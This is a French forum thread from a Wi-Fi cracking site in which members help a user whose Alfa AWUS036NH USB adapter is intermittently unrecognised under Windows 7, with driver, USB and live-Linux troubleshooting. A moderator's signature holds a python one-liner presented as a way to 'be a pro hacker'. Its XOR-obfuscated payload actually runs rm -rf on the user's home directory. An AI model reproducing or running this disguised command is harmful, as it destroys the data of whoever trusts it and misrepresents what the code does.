Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-09-2012 17:24:53

jacques-mesrine
N00b
Inscription : 21-09-2012
Messages : 4

Alfa AWUS036NH Plus reconnu Windows 7

Bonjour

j'ai fais l'acquisition d'une Alfa AWUS036NH et je l'ai installer via le cd sous windows 7 x64 et elle a fonctionner niquel pendant une 1 heure et ensuite j'ai changer le pc de place et tout d'un coup plus d'internet...

Je regarde dans le gestionnaire du reseau RALINK et il est en "noir" et il est indiqué "RALINK WIRELESS LAN CARD NOT EXIST"


Et dans le gestionnaire de périphérique elle n'est plus reconnu et il est marqué : "Unknown Device"

- J'ai désinstaller la carte via le cd et ensuite redemarer et réinstaller

- J'ai désinstaller le connecteur usb dans le gestionnaire de périphérique

mais elle n'est toujours pas reconnu mais elle s'allume bleu.

Que puis je faire ?

Merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-09-2012 09:14:45

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : Alfa AWUS036NH Plus reconnu Windows 7

C'est une vraie alfa ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 22-09-2012 12:01:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Alfa AWUS036NH Plus reconnu Windows 7

As tu essayé dans plusieurs port USB?
Utilises tu plusieurs rallonges USB? Quelle longueur de câble USB?
Va dans menue start > panneau de contrôle > administrateur de périphériques et regarde ce qui se passe dans "adaptateur wireless" (petite carte verte).
Est-ce que il y a un périphérique reconnu? Avec un point d'exclamation jaune?
Si oui c'est un problème de pilote/installation, désinstalle le driver existant (click droit sur ton périphérique dans le gestionnaire de périphérique) , télécharge le dernier driver en date pour ton alfa depuis le site officiel et reprend le processus d'installation depuis le début avec le dernier driver en date.
Suis bien les instructions du genre introduire votre USB avant ou après de lancer l'installation etc.
Si tu as/avais un autre adaptateur USB installé préalablement fait attention à bien désinstaller proprement les drivers de ton ancien adaptateur ainsi que l'utilité de gestion de reds. Windows est spécialiste dans les conflits bizarroïdes.
Si ça ne marche toujours pas, essaye un linux grand public comme ubuntu ou xubuntu en mode live pour t'assurer de que ce n'est pas ton windows qui foire.
Si ça ne marche pas sous linux, cours changer ton adaptateur ou contacte ton vendeur par internet pour qu'il te la change.
Si ça fonctionne bien sous linux c'est que ton windows merdouille.
Là tu fais une défragmentation, une analyse avec antivirus, un bon nettoyage à l'aide de CCleaner et tu espère que ce soit suffisant.
Dès fois avec Windows se passent des choses bizarres, très bizarres. Comme des conflits entre carte interne et adaptateur USB et il faut repasser derrière.
Et si tu n'es pas top bon ni n'a beaucoup de patience c'est souvent plus simple et moins risqué de réinstaller tout que d'essayer de toucher toi même au registre et autres subtilités de windows.

Hors Ligne

#4 22-09-2012 13:03:23

jacques-mesrine
N00b
Inscription : 21-09-2012
Messages : 4

Re : Alfa AWUS036NH Plus reconnu Windows 7

Je tiens tout d'abord à vous remercier pour vos réponse et votre aide!!!

spawn a écrit :

C'est une vraie alfa ?

Je pense je l'ai acheté la : http://www.amazon.fr/Alfa-AWUSO36NH-gag … 134&sr=8-3

Comment fais tu pour savoir si c'est une vrai ou une fausse ???

kcdtv a écrit :

As tu essayé dans plusieurs port USB?

Oui j'ai essayé sur les 4 et toujours le meme message, device unknown

Utilises tu plusieurs rallonges USB? Quelle longueur de câble USB?

J'ai fais avec le cable d'origine et une rallonge usb et aussi avec un autre cable et elle est reconnu par moment sur la rallonge et ensuite je débranche la rallonge et elle est de nouveau plus reconnu.... A ne rien comprendre!!! et sur un autre pc et elle était aussi reconnu puis 10 min plus tard elle ne l'était plus, puis j'avais le même problème que sur mon pc....

Va dans menue start > panneau de contrôle > administrateur de périphériques et regarde ce qui se passe dans "adaptateur wireless" (petite carte verte).
Est-ce que il y a un périphérique reconnu? Avec un point d'exclamation jaune?

Oui et quand j'essaie de mettre le pilote à jour en indiquant le cd ou il y a le driver , windobe me dit que le pilote est à jour...

Si oui c'est un problème de pilote/installation, désinstalle le driver existant (click droit sur ton périphérique dans le gestionnaire de périphérique) , télécharge le dernier driver en date pour ton alfa depuis le site officiel et reprend le processus d'installation depuis le début avec le dernier driver en date.
Suis bien les instructions du genre introduire votre USB avant ou après de lancer l'installation etc.

J'avais telecharger le driver de chez Alfa et c'est un .exe , mais quand je le lance il me met le meme message que via le cd, Désinstaller la carte et le programme et je l'ai fais 2 fois mais toujours le meme problème!!!

Si tu as/avais un autre adaptateur USB installé préalablement fait attention à bien désinstaller proprement les drivers de ton ancien adaptateur ainsi que l'utilité de gestion de res. Windows est spécialiste dans les conflits bizarroïdes.

Je n'avais pas d'adaptateur USB, mais j'ai par contre installer : vmware et virtualbox ???

Si ça ne marche toujours pas, essaye un linux grand public comme ubuntu ou xubuntu en mode live pour t'assurer de que ce n'est pas ton windows qui foire.

C'est ce que je comptais faire aujourd'hui mais bizarrement avant d'essayer cette méthode je me suis dis que j'allais réessayer une dernière fois sous windows pour voir et aller prendre les drivers de chez ralink mais j'ai allumer le pc et brancher la carte et j'ai été voir dans " périphérique et imprimantes" et comme par magie je vois le nom de la carte donc je lance le gestionnaire de wifi "Ralink" et elle était reconnu... Et d'ailleurs j'envois ce message via la carte...

Si ça ne marche pas sous linux, cours changer ton adaptateur ou contacte ton vendeur par internet pour qu'il te la change.

Es ce que ce serait pas la carte qui déconne , le fait qu'elle marche puis s'arrete toutes seul, reconnu à un démarrage puis plus reconnus que ce soit sur ce pc ou un autre

Si ça fonctionne bien sous linux c'est que ton windows merdouille.
Là tu fais une défragmentation, une analyse avec antivirus, un bon nettoyage à l'aide de CCleaner et tu espère que ce soit suffisant.

Je ne pense pas que ce soit windows qui déconne vu que j'ai tester sur un autre windows 7 x64 mais peut etre une histoire de driver qui passe mal sur x64??? 

- Avez vous deja eu ce problème sous windobe x64?

- En fouillant sur notre bon vieu amis Google, je suis tomber sur un post d'un gars qui parlais de même symptôme et il conseillait d'éteindre le pc , retirer le chargeur et la batterie, et de laisser appuyer 1 min sur le bouton power et de rallumer le pc et c'est ce que j'ai fais hier soir mais je ne l'ai pas rallumer mais aujourd’hui ... et comme par miracle, la carte est reconnu...??????

- Se peut il que ce soit parce que hier j'avais une antenne 8dbi et qu’aujourd’hui j'ai remis une 5?

PS : Je viens d'essayer sous Backtrack 5r2 avec virtualbox portalbe et j'ai internet mais je ne sais pas comment faire pour aller voir la carte????

Je viens de faire : iwconfig dans backtrack et elle à l'air d'etre reconnu mais je vais voir sur un autre os

Dernière modification par jacques-mesrine (22-09-2012 14:20:57)

Hors Ligne

#5 22-09-2012 14:02:10

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Alfa AWUS036NH Plus reconnu Windows 7

Non sa na rien a avoir avec l'antenne, ton pc ne serai pas de type "acer" par hasard??
Car j'ai déjà eu des soucis avec ce genre de pc, et normalement tout se qui se trouve en ram doit se vider quand tu éteint, mais avec certain pc, il doit rester de la merde en ram ou autre, car cette manip la ,

jacques-mesrine a écrit :

il conseillait d'éteindre le pc , retirer le chargeur et la batterie, et de laisser appuyer 1 min sur le bouton power et de rallumer le pc

je l'ai déjà rencontré aussi, et cela avais réglé les problème que je rencontrais.

En tout cas ravis que sa refonctionne pour toi.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#6 23-09-2012 13:15:20

jacques-mesrine
N00b
Inscription : 21-09-2012
Messages : 4

Re : Alfa AWUS036NH Plus reconnu Windows 7

goliate a écrit :

Non sa na rien a avoir avec l'antenne, ton pc ne serai pas de type "acer" par hasard??
Car j'ai déjà eu des soucis avec ce genre de pc, et normalement tout se qui se trouve en ram doit se vider quand tu éteint, mais avec certain pc, il doit rester de la merde en ram ou autre, car cette manip la ,

jacques-mesrine a écrit :

il conseillait d'éteindre le pc , retirer le chargeur et la batterie, et de laisser appuyer 1 min sur le bouton power et de rallumer le pc

je l'ai déjà rencontré aussi, et cela avais réglé les problème que je rencontrais.

En tout cas ravis que sa refonctionne pour toi.

non c'est un Asus mais j'ai tester sur portable de mon beau père est j'ai le même soucis de détection de carte... Je me demande si je ne vais pas la renvoyer car j'ai essayer de voir si elle était détercter tout le temps mais non. C'est aléatoire, je la branche sur un port et elle est reconnue, je débranche et rebranche => plus reconnus... , rebranche => reconnu ...

A n'y rien comprendre...

En tout cas merci pour votre aide

Dernière modification par jacques-mesrine (23-09-2012 13:16:05)

Hors Ligne

#7 23-09-2012 14:23:28

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Alfa AWUS036NH Plus reconnu Windows 7

Tu débranche comment?

A la sauvage?
Ou tu vas dans les icônes en bas a droite et tu fait retirer le périphérique?(sous win xp en tout cas.)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#8 27-09-2012 20:54:35

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Alfa AWUS036NH Plus reconnu Windows 7

Si la carte pose le même problème sur plusieurs machines différentes, je penche pour un problème matériel, fais jouer la garantie. Note que les pilotes Alfa sous Win764 sont connus connus pour être foireux. Essaye avec un Win32 pour être sûr.

Sinon, vérifie que le pilote est complètement viré :
- tu vas dans C:\Windows\system32\drivers\
- tu cherches (et efface) un fichier rt2870 ou rt3070, tu peux juste le déplacer ou le renommer si tu veux jouer la sécurité.

Un autre test intéressant serait de la tester avec BackTrack en Live (DVD ou USB). Si elle apparaît dans "lsusb" et qu'elle semble fonctionner correctement, le problème est du côté de Windows mais ta carte va bien wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]